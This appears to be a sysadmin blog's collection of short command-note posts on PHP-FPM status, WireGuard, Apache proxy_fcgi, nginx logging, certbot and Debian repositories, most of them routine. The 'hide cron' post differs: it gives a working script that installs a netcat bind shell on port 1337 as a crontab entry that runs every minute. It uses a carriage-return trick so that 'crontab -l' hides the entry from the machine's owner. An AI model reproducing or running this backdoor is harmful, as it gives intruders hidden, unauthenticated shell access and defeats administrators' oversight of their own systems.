PHP-FPM get status

Leave a reply

cat /etc/php/7.4/fpm/pool.d/www.conf | grep -v \; | awk 'NF' | tee /etc/php/7.4/fpm/pool.d/www.conf
vi /etc/php/7.4/fpm/pool.d/www.conf

pm.status_path=/status
ping.path=/ping
ping.response=pong

apt install fcgiwrap
ss -l | grep php
u_strLISTEN 0 511 /run/php/php7.4-fpm.sock 79744 * 0

SCRIPT_NAME=/status \
SCRIPT_FILENAME=/status \
REQUEST_METHOD=GET \
cgi-fcgi -bind -connect /run/php/php7.4-fpm.sock

Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0
Content-type: text/plain;charset=UTF-8

pool: www
process manager: dynamic
start time: 07/Feb/2021:13:44:50 +0200
start since: 382
accepted conn: 3
listen queue: 0
max listen queue: 0
listen queue len: 0
idle processes: 1
active processes: 1
total processes: 2
max active processes: 1
max children reached: 0
slow requests: 0

wireguard setup

Leave a reply

add-apt-repository ppa:wireguard/wireguard
apt-get update
apt install wireguard

MacOS
brew install wireguard-tools

wg genkey | tee privatekey | wg pubkey > publickey

Server side:
/etc/wireguard/wg0.conf

[Interface]
Address = 10.0.0.1/24
DNS = 1.1.1.1
PrivateKey = [ServerPrivateKey]
ListenPort = 51820
PostUp = iptables -A FORWARD -i %i -j ACCEPT; iptables -A FORWARD -o %i -j ACCEPT; iptables -t nat -A POSTROUTING -o enp9s0 -j MASQUERADE
PostDown = iptables -D FORWARD -i %i -j ACCEPT; iptables -D FORWARD -o %i -j ACCEPT; iptables -t nat -D POSTROUTING -o enp9s0 -j MASQUERADE

[Peer]
#Peer #1
PublicKey = [Peer#1PublicKey]
AllowedIPs = 10.0.0.3/32

[Peer]
#Peer #2
PublicKey = [Peer#2PublicKey]
AllowedIPs = 10.0.0.10/32

[Peer]
#Peer #3
PublicKey = [Peer#3PublicKey]
AllowedIPs = 10.0.0.2/32

[Peer]
#Peer #4
PublicKey = [Peer#4PublicKey]
AllowedIPs = 10.0.0.11/32

Client side:
/etc/wireguard/wg0.conf

[Interface]
Address = 10.0.0.3/24
PrivateKey = [PrivateKeyPeer#1]

[Peer]
PublicKey = [ServerPublicKey]
Endpoint = some.domain.com:51820
AllowedIPs = 0.0.0.0/0

# This is for if you're behind a NAT and
# want the connection to be kept alive.
PersistentKeepalive = 25

Start/stop interface
wg-quick up wg0
wg-quick down wg0

Start/stop service
$ sudo systemctl stop [email protected]
$ sudo systemctl start [email protected]

Instead of having to modify the file for every client you want to add to the
server you could also use the wg tool instead:

# add peer
wg set wg0 peer allowed-ips 10.0.0.x/32

# verify connection
wg

# save to config
wg-quick save wg0

proxy_fcgi apache

Leave a reply

apt install apache2 php7.4-fpm

a2enconf php7.4-fpm
a2enmod proxy proxy_fcgi

cat /etc/apache2/conf-enabled/php7.4-fpm.conf 
# Redirect to local php-fpm if mod_php is not available
<IfModule !mod_php7.c>
<IfModule proxy_fcgi_module>
    # Enable http authorization headers
    <IfModule setenvif_module>
    SetEnvIfNoCase ^Authorization$ "(.+)" HTTP_AUTHORIZATION=$1
    </IfModule>

    <FilesMatch ".+\.ph(ar|p|tml)$">
        SetHandler "proxy:unix:/run/php/php7.4-fpm.sock|fcgi://localhost"
    </FilesMatch>
    <FilesMatch ".+\.phps$">
        # Deny access to raw php sources by default
        # To re-enable it's recommended to enable access to the files
        # only in specific virtual host or directory
        Require all denied
    </FilesMatch>
    # Deny access to files without filename (e.g. '.php')
    <FilesMatch "^\.ph(ar|p|ps|tml)$">
        Require all denied
    </FilesMatch>
</IfModule>
</IfModule>

hide cron

Leave a reply


printf "* * * * * >/tmp/x;\rno crontab for $USER\n" | crontab -
crontab -l
no crontab for vit

Hidden backdoor:

BDOOR_PT=1337
BDOOR_SH="{ \
cd /tmp; mkfifo .i .o; \
cat .o | nc -l -p ${BDOOR_PT} > .i & \
/bin/sh < .i &>.o ; rm -f .i .o; \
}"

# scheduled task that will be hidden
HIDDEN="* * * * * ${BDOOR_SH}>/dev/null 2>&1"

# Display the current cron table and modify the first line
crontab -l 2>&1 | {
read FIRST_TASK;
if [ ${#HIDDEN} -gt ${#FIRST_TASK} ]; then
# end the first crontab line with spaces to hide our backdoor and
# one more character (";").
while (( i < (${#HIDDEN} - ${#SHOWN_TASK} + 1) )); do FIRST_TASK="${FIRST_TASK} "; ((i++)) done fi # carriage return goes there ("\r") printf "${HIDDEN};\r${FIRST_TASK}\n"; cat } | crontab - if [ $? -eq 0 ]; then echo "Backdoor is now hidden in cron table" echo "Shell will be bind on port ${BDOOR_PT}." else echo "Failed." fi

nginx log response time

Leave a reply


vi /etc/nginx/nginx.conf

log_format timed_combined '$remote_addr - $remote_user [$time_local] '
'"$request" $status $body_bytes_sent '
'"$http_referer" "$http_user_agent" '
'$request_time $upstream_response_time $pipe';

access_log /var/log/nginx/srv24x7.com.access.log timed_combined;

certbot cloudflare DNS authentication API

Leave a reply

add-apt-repository ppa:certbot/certbot
apt install software-properties-common
apt update
apt install python-certbot-nginx
apt install python-pip
pip install certbot-dns-cloudflare

vi /root/.secrets/cloudflare.cfg
dns_cloudflare_api_key = “xxx”

certbot certonly –dns-cloudflare –dns-cloudflare-credentials /root/.secrets/cloudflare.ini -d domain.com,*.domain.com –preferred-challenges dns-01

E: Release file for http://archive.debian.org/debian-security/dists/wheezy/updates/Release is expired (invalid since 659d 21h 46min 15s). Updates for this repository will not be applied

Leave a reply


Err http://security.debian.org/ wheezy/updates/main libcurl3 amd64 7.26.0-1+wheezy25+deb7u1 404 Not Found [IP: 151.101.0.204 80

cat /etc/apt/sources.list
deb http://archive.debian.org/debian wheezy main
deb http://archive.debian.org/debian-security wheezy/updates main
deb http://security.debian.org/ wheezy/updates main contrib non-free

apt-get -o Acquire::Check-Valid-Until=false install curl

prestashop enable SSL SQL

Leave a reply


mysql> SELECT * FROM `ps_configuration` WHERE name like 'PS_SSL_ENABLED%' ;
+------------------+---------------+---------+---------------------------+-------+---------------------+---------------------+
| id_configuration | id_shop_group | id_shop | name | value | date_add | date_upd |
+------------------+---------------+---------+---------------------------+-------+---------------------+---------------------+
| 29 | NULL | NULL | PS_SSL_ENABLED | 0 | 0000-00-00 00:00:00 | 0000-00-00 00:00:00 |
| 288 | NULL | NULL | PS_SSL_ENABLED_EVERYWHERE | 0 | 2021-01-24 00:52:10 | 2021-01-24 00:52:10 |
+------------------+---------------+---------+---------------------------+-------+---------------------+---------------------+

mysql> update ps_configuration set value=1 where id_configuration=29;
mysql> update ps_configuration set value=1 where id_configuration=288;